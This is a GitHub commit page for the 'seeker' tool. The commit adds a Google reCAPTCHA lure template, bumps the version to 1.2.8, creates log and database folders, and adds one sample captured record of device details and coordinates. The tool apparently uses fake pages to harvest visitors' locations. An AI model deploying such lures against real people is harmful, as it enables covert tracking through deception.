Skip to content

Commit

Permalink
v1.2.8 - recaptcha template added, other improvements
Browse files Browse the repository at this point in the history
  • Loading branch information
thewhiteh4t committed Jul 7, 2022
1 parent f52f875 commit 9ceac3f
Show file tree
Hide file tree
Showing 23 changed files with 217 additions and 1,313 deletions.
8 changes: 3 additions & 5 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
db/results.csv
logs/*
.log
*.csv
.txt
db/
logs/
templates/__pycache__/
1 change: 1 addition & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -83,6 +83,7 @@ Available Templates :
* WhatsApp (Suggested by @Dazmed707)
* Telegram
* Zoom (Made by @a7maadf)
* Google reCAPTCHA (Made by @MrEgyptian)

## Tested On :

Expand Down
2 changes: 1 addition & 1 deletion db/results.csv
Original file line number Diff line number Diff line change
@@ -1 +1 @@

Linux x86_64,Linux x86_64,4,Not Available,Mesa/X.org,llvmpipe,1920x1080,Firefox/91.0,127.0.0.1,28.4597 deg,77.0282 deg,20000 m,Not Available,Not Available,Not Available
2 changes: 1 addition & 1 deletion metadata.json
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"name": "seeker",
"author": "thewhiteh4t",
"version": "1.2.7",
"version": "1.2.8",
"twitter": "https://twitter.com/thewhiteh4t",
"comms": "https://twc1rcle.com/"
}
19 changes: 13 additions & 6 deletions seeker.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
#!/usr/bin/env python3

VERSION = '1.2.7'
VERSION = '1.2.8'

R = '\033[31m' # red
G = '\033[32m' # green
Expand All @@ -12,7 +12,7 @@
import argparse
import requests
import traceback
from os import path, kill
from os import path, kill, mkdir
from json import loads, decoder
from packaging import version

Expand All @@ -32,15 +32,22 @@

SITE = ''
SERVER_PROC = ''
INFO = f'{path_to_script}/logs/info.txt'
RESULT = f'{path_to_script}/logs/result.txt'
LOG_DIR = f'{path_to_script}/logs'
DB_DIR = f'{path_to_script}/db'
LOG_FILE = f'{LOG_DIR}/php.log'
DATA_FILE = f'{DB_DIR}/results.csv'
INFO = f'{LOG_DIR}/info.txt'
RESULT = f'{LOG_DIR}/result.txt'
TEMPLATES_JSON = f'{path_to_script}/template/templates.json'
LOG_FILE = f'{path_to_script}/logs/php.log'
TEMP_KML = f'{path_to_script}/template/sample.kml'
DATA_FILE = f'{path_to_script}/db/results.csv'
META_FILE = f'{path_to_script}/metadata.json'
META_URL = 'https://raw.githubusercontent.com/thewhiteh4t/seeker/master/metadata.json'

if not path.isdir(LOG_DIR):
mkdir(LOG_DIR)

if not path.isdir(DB_DIR):
mkdir(DB_DIR)

def chk_update():
try:
Expand Down
Binary file added template/__pycache__/mod_captcha.cpython-310.pyc
Binary file not shown.
1 change: 0 additions & 1 deletion template/captcha/ReCAPTCHA demo_files/demo__ltr.css

This file was deleted.

Loading

0 comments on commit 9ceac3f

Please sign in to comment.